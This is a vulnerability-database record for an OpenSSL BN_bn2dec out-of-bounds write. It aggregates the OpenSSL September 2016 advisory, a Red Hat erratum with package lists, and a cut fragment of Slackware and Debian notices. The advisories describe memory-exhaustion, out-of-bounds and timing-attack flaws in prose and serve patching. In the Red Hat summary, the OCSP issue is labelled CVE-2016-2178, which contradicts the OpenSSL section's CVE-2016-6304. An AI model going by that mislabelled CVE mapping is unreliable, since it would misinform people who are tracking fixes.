packages as root:\n# upgradepkg openssl-1.0.2n-i586-1_slack14.2.txz openssl-solibs-1.0.2n-i586-1_slack14.2.txz\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. \n\nDetails can be found in the upstream advisory:\nhttps://www.openssl.org/news/secadv/20180327.txt\n\nFor the oldstable distribution (jessie), these problems have been fixed\nin version 1.0.1t-1+deb8u8. The oldstable distribution is not affected\nby CVE-2017-3738. \n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 1.1.0f-3+deb9u2. \n\nFor the detailed security status of openssl please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/openssl\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAlq9UxtfFIAAAAAALgAo\naXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2\nNDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND\nz0Qi/Q//U7BsT4ITKgPcpErXfKx5RXi2xcPw/trUr83HqZvNIR99HUnQPVYbkyyX\nPLvB6xhmPAjx4cQFff8e5EIHR2OpoRzZ5nAvqo2b2bn1liVL1/pllYmj5HiHz5tb\n8NXuDrDpO432rFDgrba6LDlXulq4Kux/NJpg1G/CkzNHMXXZR9xi3JZDMZU7jiZC\neGynQd1MLlF2+6qWIX/7KJHI+tmT4ZNDK9IDMv/YH71gvku0ICY8zB+1qeHP7mPN\ndYYC6v5rqrES1SF//NxYu26E/YNo7krn6tN0OPhoDRZ3aPuqyOfB7QpxHOsdztfQ\n2mIcXzS5JXdhQ5J8aEBrziAQ/nSoW+T533LniXVIiSQn+sYjrjg1vRt5PrBLx2N0\nCNX4OVcstV2bGYKknOGYBVnEzURGoeydHx3zZn/OflCe+X6lpxQAwmfgrw4+T+FX\nQxnjVEn4e5HeR2RGOnHzA6g3GuyJ+OeU3g0WEbAgOhqowTx3OOX7/htYnt702GKQ\n9aA4ypYG8228owbno857nfnDb6eGbeqeH3BF8B20p4VHwlL1+XxyMmM+yzgbwCoA\n8npl1DiiyUNBFl3WpQrjg7NwWXw+EGp5F+GxRip9yO/8cxKXn3+LqZP7gGR/+Mz5\nATXpKzuY6L8Gzh4Y+W7IH+iApSpSOlDXzo18PVCfp9qxnKNjetA=\n=whaV\n-----END PGP SIGNATURE-----\n",
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VAR-201609-0595
Vulnerability from variot - Updated: 2026-04-10 21:41The BN_bn2dec function in crypto/bn/bn_print.c in OpenSSL before 1.1.0 does not properly validate division results, which allows remote attackers to cause a denial of service (out-of-bounds write and application crash) or possibly have unspecified other impact via unknown vectors. ( Out-of-bounds writes and application crashes ) There are vulnerabilities that are subject to unspecified impact, such as being put into a state. Supplementary information : CWE Vulnerability type by CWE-787: Out-of-bounds Write ( Out-of-bounds writing ) Has been identified. http://cwe.mitre.org/data/definitions/787.htmlService disruption by a third party ( Out-of-bounds writes and application crashes ) There is a possibility of being affected unspecified, such as being in a state. OpenSSL is prone to denial-of-service vulnerability. An attacker may exploit this issue to crash the affected application, resulting in denial-of-service condition. OpenSSL Security Advisory [22 Sep 2016] ========================================
OCSP Status Request extension unbounded memory growth (CVE-2016-6304)
Severity: High
A malicious client can send an excessively large OCSP Status Request extension. If that client continually requests renegotiation, sending a large OCSP Status Request extension each time, then there will be unbounded memory growth on the server. This will eventually lead to a Denial Of Service attack through memory exhaustion. Servers with a default configuration are vulnerable even if they do not support OCSP. Builds using the "no-ocsp" build time option are not affected.
Servers using OpenSSL versions prior to 1.0.1g are not vulnerable in a default configuration, instead only if an application explicitly enables OCSP stapling support.
OpenSSL 1.1.0 users should upgrade to 1.1.0a OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 29th August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL development team.
SSL_peek() hang on empty record (CVE-2016-6305)
Severity: Moderate
OpenSSL 1.1.0 SSL/TLS will hang during a call to SSL_peek() if the peer sends an empty record. This could be exploited by a malicious peer in a Denial Of Service attack.
OpenSSL 1.1.0 users should upgrade to 1.1.0a
This issue was reported to OpenSSL on 10th September 2016 by Alex Gaynor. The fix was developed by Matt Caswell of the OpenSSL development team.
SWEET32 Mitigation (CVE-2016-2183)
Severity: Low
SWEET32 (https://sweet32.info) is an attack on older block cipher algorithms that use a block size of 64 bits. In mitigation for the SWEET32 attack DES based ciphersuites have been moved from the HIGH cipherstring group to MEDIUM in OpenSSL 1.0.1 and OpenSSL 1.0.2. OpenSSL 1.1.0 since release has had these ciphersuites disabled by default.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 16th August 2016 by Karthikeyan Bhargavan and Gaetan Leurent (INRIA). The fix was developed by Rich Salz of the OpenSSL development team.
OOB write in MDC2_Update() (CVE-2016-6303)
Severity: Low
An overflow can occur in MDC2_Update() either if called directly or through the EVP_DigestUpdate() function using MDC2. If an attacker is able to supply very large amounts of input data after a previous call to EVP_EncryptUpdate() with a partial block then a length check can overflow resulting in a heap corruption.
The amount of data needed is comparable to SIZE_MAX which is impractical on most platforms.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 11th August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
Malformed SHA512 ticket DoS (CVE-2016-6302)
Severity: Low
If a server uses SHA512 for TLS session ticket HMAC it is vulnerable to a DoS attack where a malformed ticket will result in an OOB read which will ultimately crash.
The use of SHA512 in TLS session tickets is comparatively rare as it requires a custom server callback and ticket lookup mechanism.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 19th August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
OOB write in BN_bn2dec() (CVE-2016-2182)
Severity: Low
The function BN_bn2dec() does not check the return value of BN_div_word(). This can cause an OOB write if an application uses this function with an overly large BIGNUM. This could be a problem if an overly large certificate or CRL is printed out from an untrusted source. TLS is not affected because record limits will reject an oversized certificate before it is parsed.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 2nd August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
OOB read in TS_OBJ_print_bio() (CVE-2016-2180)
Severity: Low
The function TS_OBJ_print_bio() misuses OBJ_obj2txt(): the return value is the total length the OID text representation would use and not the amount of data written. This will result in OOB reads when large OIDs are presented.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 21st July 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
Pointer arithmetic undefined behaviour (CVE-2016-2177)
Severity: Low
Avoid some undefined pointer arithmetic
A common idiom in the codebase is to check limits in the following manner: "p + len > limit"
Where "p" points to some malloc'd data of SIZE bytes and limit == p + SIZE
"len" here could be from some externally supplied data (e.g. from a TLS message).
The rules of C pointer arithmetic are such that "p + len" is only well defined where len <= SIZE. Therefore the above idiom is actually undefined behaviour.
For example this could cause problems if some malloc implementation provides an address for "p" such that "p + len" actually overflows for values of len that are too big and therefore p + len < limit.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 4th May 2016 by Guido Vranken. The fix was developed by Matt Caswell of the OpenSSL development team.
Constant time flag not preserved in DSA signing (CVE-2016-2178)
Severity: Low
Operations in the DSA signing algorithm should run in constant time in order to avoid side channel attacks. A flaw in the OpenSSL DSA implementation means that a non-constant time codepath is followed for certain operations. This has been demonstrated through a cache-timing attack to be sufficient for an attacker to recover the private DSA key.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 23rd May 2016 by César Pereida (Aalto University), Billy Brumley (Tampere University of Technology), and Yuval Yarom (The University of Adelaide and NICTA). The fix was developed by César Pereida.
DTLS buffered message DoS (CVE-2016-2179)
Severity: Low
In a DTLS connection where handshake messages are delivered out-of-order those messages that OpenSSL is not yet ready to process will be buffered for later use. Under certain circumstances, a flaw in the logic means that those messages do not get removed from the buffer even though the handshake has been completed. An attacker could force up to approx. 15 messages to remain in the buffer when they are no longer required. These messages will be cleared when the DTLS connection is closed. The default maximum size for a message is 100k. Therefore the attacker could force an additional 1500k to be consumed per connection. By opening many simulataneous connections an attacker could cause a DoS attack through memory exhaustion.
OpenSSL 1.0.2 DTLS users should upgrade to 1.0.2i OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 22nd June 2016 by Quan Luo. The fix was developed by Matt Caswell of the OpenSSL development team.
DTLS replay protection DoS (CVE-2016-2181)
Severity: Low
A flaw in the DTLS replay attack protection mechanism means that records that arrive for future epochs update the replay protection "window" before the MAC for the record has been validated. This could be exploited by an attacker by sending a record for the next epoch (which does not have to decrypt or have a valid MAC), with a very large sequence number. This means that all subsequent legitimate packets are dropped causing a denial of service for a specific DTLS connection.
OpenSSL 1.0.2 DTLS users should upgrade to 1.0.2i OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 21st November 2015 by the OCAP audit team. The fix was developed by Matt Caswell of the OpenSSL development team.
Certificate message OOB reads (CVE-2016-6306)
Severity: Low
In OpenSSL 1.0.2 and earlier some missing message length checks can result in OOB reads of up to 2 bytes beyond an allocated buffer. There is a theoretical DoS risk but this has not been observed in practice on common platforms.
The messages affected are client certificate, client certificate request and server certificate. As a result the attack can only be performed against a client or a server which enables client authentication.
OpenSSL 1.1.0 is not affected.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 22nd August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
Excessive allocation of memory in tls_get_message_header() (CVE-2016-6307)
Severity: Low
A TLS message includes 3 bytes for its length in the header for the message. This would allow for messages up to 16Mb in length. Messages of this length are excessive and OpenSSL includes a check to ensure that a peer is sending reasonably sized messages in order to avoid too much memory being consumed to service a connection. A flaw in the logic of version 1.1.0 means that memory for the message is allocated too early, prior to the excessive message length check. Due to way memory is allocated in OpenSSL this could mean an attacker could force up to 21Mb to be allocated to service a connection. This could lead to a Denial of Service through memory exhaustion. However, the excessive message length check still takes place, and this would cause the connection to immediately fail. Assuming that the application calls SSL_free() on the failed conneciton in a timely manner then the 21Mb of allocated memory will then be immediately freed again. Therefore the excessive memory allocation will be transitory in nature. This then means that there is only a security impact if:
1) The application does not call SSL_free() in a timely manner in the event that the connection fails or 2) The application is working in a constrained environment where there is very little free memory or 3) The attacker initiates multiple connection attempts such that there are multiple connections in a state where memory has been allocated for the connection; SSL_free() has not yet been called; and there is insufficient memory to service the multiple requests.
Except in the instance of (1) above any Denial Of Service is likely to be transitory because as soon as the connection fails the memory is subsequently freed again in the SSL_free() call. However there is an increased risk during this period of application crashes due to the lack of memory - which would then mean a more serious Denial of Service.
This issue does not affect DTLS users.
OpenSSL 1.1.0 TLS users should upgrade to 1.1.0a
This issue was reported to OpenSSL on 18th September 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL development team.
Excessive allocation of memory in dtls1_preprocess_fragment() (CVE-2016-6308)
Severity: Low
This issue is very similar to CVE-2016-6307. The underlying defect is different but the security analysis and impacts are the same except that it impacts DTLS.
A DTLS message includes 3 bytes for its length in the header for the message. This would allow for messages up to 16Mb in length. Messages of this length are excessive and OpenSSL includes a check to ensure that a peer is sending reasonably sized messages in order to avoid too much memory being consumed to service a connection. A flaw in the logic of version 1.1.0 means that memory for the message is allocated too early, prior to the excessive message length check. Due to way memory is allocated in OpenSSL this could mean an attacker could force up to 21Mb to be allocated to service a connection. This could lead to a Denial of Service through memory exhaustion. However, the excessive message length check still takes place, and this would cause the connection to immediately fail. Assuming that the application calls SSL_free() on the failed conneciton in a timely manner then the 21Mb of allocated memory will then be immediately freed again. Therefore the excessive memory allocation will be transitory in nature. This then means that there is only a security impact if:
1) The application does not call SSL_free() in a timely manner in the event that the connection fails or 2) The application is working in a constrained environment where there is very little free memory or 3) The attacker initiates multiple connection attempts such that there are multiple connections in a state where memory has been allocated for the connection; SSL_free() has not yet been called; and there is insufficient memory to service the multiple requests.
Except in the instance of (1) above any Denial Of Service is likely to be transitory because as soon as the connection fails the memory is subsequently freed again in the SSL_free() call. However there is an increased risk during this period of application crashes due to the lack of memory - which would then mean a more serious Denial of Service.
This issue does not affect TLS users.
OpenSSL 1.1.0 DTLS users should upgrade to 1.1.0a
This issue was reported to OpenSSL on 18th September 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL development team.
Note
As per our previous announcements and our Release Strategy (https://www.openssl.org/policies/releasestrat.html), support for OpenSSL version 1.0.1 will cease on 31st December 2016. No security updates for that version will be provided after that date. Users of 1.0.1 are advised to upgrade.
Support for versions 0.9.8 and 1.0.0 ended on 31st December 2015. Those versions are no longer receiving security updates.
References
URL for this Security Advisory: https://www.openssl.org/news/secadv/20160922.txt
Note: the online version of the advisory may be updated with additional details over time.
For details of OpenSSL severity classifications please see: https://www.openssl.org/policies/secpolicy.html . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: openssl security update Advisory ID: RHSA-2016:1940-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-1940.html Issue date: 2016-09-27 CVE Names: CVE-2016-2177 CVE-2016-2178 CVE-2016-2179 CVE-2016-2180 CVE-2016-2181 CVE-2016-2182 CVE-2016-6302 CVE-2016-6304 CVE-2016-6306 =====================================================================
- Summary:
An update for openssl is now available for Red Hat Enterprise Linux 6 and Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, as well as a full-strength general-purpose cryptography library. A remote attacker could cause a TLS server using OpenSSL to consume an excessive amount of memory and, possibly, exit unexpectedly after exhausting all available memory, if it enabled OCSP stapling support. (CVE-2016-2178)
-
It was discovered that the Datagram TLS (DTLS) implementation could fail to release memory in certain cases. A malicious DTLS client could cause a DTLS server using OpenSSL to consume an excessive amount of memory and, possibly, exit unexpectedly after exhausting all available memory. A remote attacker could possibly use this flaw to make a DTLS server using OpenSSL to reject further packets sent from a DTLS client over an established DTLS connection. (CVE-2016-2181)
-
An out of bounds write flaw was discovered in the OpenSSL BN_bn2dec() function. (CVE-2016-2182)
-
A flaw was found in the DES/3DES cipher was used as part of the TLS/SSL protocol. A man-in-the-middle attacker could use this flaw to recover some plaintext data by capturing large amounts of encrypted traffic between TLS/SSL server and client if the communication used a DES/3DES based ciphersuite. (CVE-2016-2183)
This update mitigates the CVE-2016-2183 issue by lowering priority of DES cipher suites so they are not preferred over cipher suites using AES. For compatibility reasons, DES cipher suites remain enabled by default and included in the set of cipher suites identified by the HIGH cipher string. Future updates may move them to MEDIUM or not enable them by default.
-
An integer underflow flaw leading to a buffer over-read was found in the way OpenSSL parsed TLS session tickets. (CVE-2016-6302)
-
Multiple integer overflow flaws were found in the way OpenSSL performed pointer arithmetic. A remote attacker could possibly use these flaws to cause a TLS/SSL server or client using OpenSSL to crash. (CVE-2016-2177)
-
An out of bounds read flaw was found in the way OpenSSL formatted Public Key Infrastructure Time-Stamp Protocol data for printing. A remote attacker could possibly use these flaws to crash a TLS/SSL server or client using OpenSSL. (CVE-2016-6306)
Red Hat would like to thank the OpenSSL project for reporting CVE-2016-6304 and CVE-2016-6306 and OpenVPN for reporting CVE-2016-2183.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted.
- Bugs fixed (https://bugzilla.redhat.com/):
1341705 - CVE-2016-2177 openssl: Possible integer overflow vulnerabilities in codebase 1343400 - CVE-2016-2178 openssl: Non-constant time codepath followed for certain operations in DSA implementation 1359615 - CVE-2016-2180 OpenSSL: OOB read in TS_OBJ_print_bio() 1367340 - CVE-2016-2182 openssl: Out-of-bounds write caused by unchecked errors in BN_bn2dec() 1369113 - CVE-2016-2181 openssl: DTLS replay protection bypass allows DoS against DTLS connection 1369383 - CVE-2016-2183 SSL/TLS: Birthday attack against 64-bit block ciphers (SWEET32) 1369504 - CVE-2016-2179 openssl: DTLS memory exhaustion DoS when messages are not removed from fragment buffer 1369855 - CVE-2016-6302 openssl: Insufficient TLS session ticket HMAC length checks 1377594 - CVE-2016-6306 openssl: certificate message OOB reads 1377600 - CVE-2016-6304 openssl: OCSP Status Request extension unbounded memory growth
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: openssl-1.0.1e-48.el6_8.3.src.rpm
i386: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm
x86_64: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-perl-1.0.1e-48.el6_8.3.i686.rpm openssl-static-1.0.1e-48.el6_8.3.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-static-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: openssl-1.0.1e-48.el6_8.3.src.rpm
x86_64: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-static-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: openssl-1.0.1e-48.el6_8.3.src.rpm
i386: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm
ppc64: openssl-1.0.1e-48.el6_8.3.ppc.rpm openssl-1.0.1e-48.el6_8.3.ppc64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.ppc.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.ppc64.rpm openssl-devel-1.0.1e-48.el6_8.3.ppc.rpm openssl-devel-1.0.1e-48.el6_8.3.ppc64.rpm
s390x: openssl-1.0.1e-48.el6_8.3.s390.rpm openssl-1.0.1e-48.el6_8.3.s390x.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.s390.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.s390x.rpm openssl-devel-1.0.1e-48.el6_8.3.s390.rpm openssl-devel-1.0.1e-48.el6_8.3.s390x.rpm
x86_64: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-perl-1.0.1e-48.el6_8.3.i686.rpm openssl-static-1.0.1e-48.el6_8.3.i686.rpm
ppc64: openssl-debuginfo-1.0.1e-48.el6_8.3.ppc64.rpm openssl-perl-1.0.1e-48.el6_8.3.ppc64.rpm openssl-static-1.0.1e-48.el6_8.3.ppc64.rpm
s390x: openssl-debuginfo-1.0.1e-48.el6_8.3.s390x.rpm openssl-perl-1.0.1e-48.el6_8.3.s390x.rpm openssl-static-1.0.1e-48.el6_8.3.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-static-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: openssl-1.0.1e-48.el6_8.3.src.rpm
i386: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm
x86_64: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-perl-1.0.1e-48.el6_8.3.i686.rpm openssl-static-1.0.1e-48.el6_8.3.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-static-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Client (v. 7):
Source: openssl-1.0.1e-51.el7_2.7.src.rpm
x86_64: openssl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.7.i686.rpm openssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.7.i686.rpm openssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-static-1.0.1e-51.el7_2.7.i686.rpm openssl-static-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: openssl-1.0.1e-51.el7_2.7.src.rpm
x86_64: openssl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.7.i686.rpm openssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.7.i686.rpm openssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-static-1.0.1e-51.el7_2.7.i686.rpm openssl-static-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: openssl-1.0.1e-51.el7_2.7.src.rpm
ppc64: openssl-1.0.1e-51.el7_2.7.ppc64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.ppc.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.ppc64.rpm openssl-devel-1.0.1e-51.el7_2.7.ppc.rpm openssl-devel-1.0.1e-51.el7_2.7.ppc64.rpm openssl-libs-1.0.1e-51.el7_2.7.ppc.rpm openssl-libs-1.0.1e-51.el7_2.7.ppc64.rpm
ppc64le: openssl-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-devel-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-libs-1.0.1e-51.el7_2.7.ppc64le.rpm
s390x: openssl-1.0.1e-51.el7_2.7.s390x.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.s390.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.s390x.rpm openssl-devel-1.0.1e-51.el7_2.7.s390.rpm openssl-devel-1.0.1e-51.el7_2.7.s390x.rpm openssl-libs-1.0.1e-51.el7_2.7.s390.rpm openssl-libs-1.0.1e-51.el7_2.7.s390x.rpm
x86_64: openssl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.7.i686.rpm openssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.7.i686.rpm openssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: openssl-debuginfo-1.0.1e-51.el7_2.7.ppc.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.ppc64.rpm openssl-perl-1.0.1e-51.el7_2.7.ppc64.rpm openssl-static-1.0.1e-51.el7_2.7.ppc.rpm openssl-static-1.0.1e-51.el7_2.7.ppc64.rpm
ppc64le: openssl-debuginfo-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-perl-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-static-1.0.1e-51.el7_2.7.ppc64le.rpm
s390x: openssl-debuginfo-1.0.1e-51.el7_2.7.s390.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.s390x.rpm openssl-perl-1.0.1e-51.el7_2.7.s390x.rpm openssl-static-1.0.1e-51.el7_2.7.s390.rpm openssl-static-1.0.1e-51.el7_2.7.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-static-1.0.1e-51.el7_2.7.i686.rpm openssl-static-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: openssl-1.0.1e-51.el7_2.7.src.rpm
x86_64: openssl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.7.i686.rpm openssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.7.i686.rpm openssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
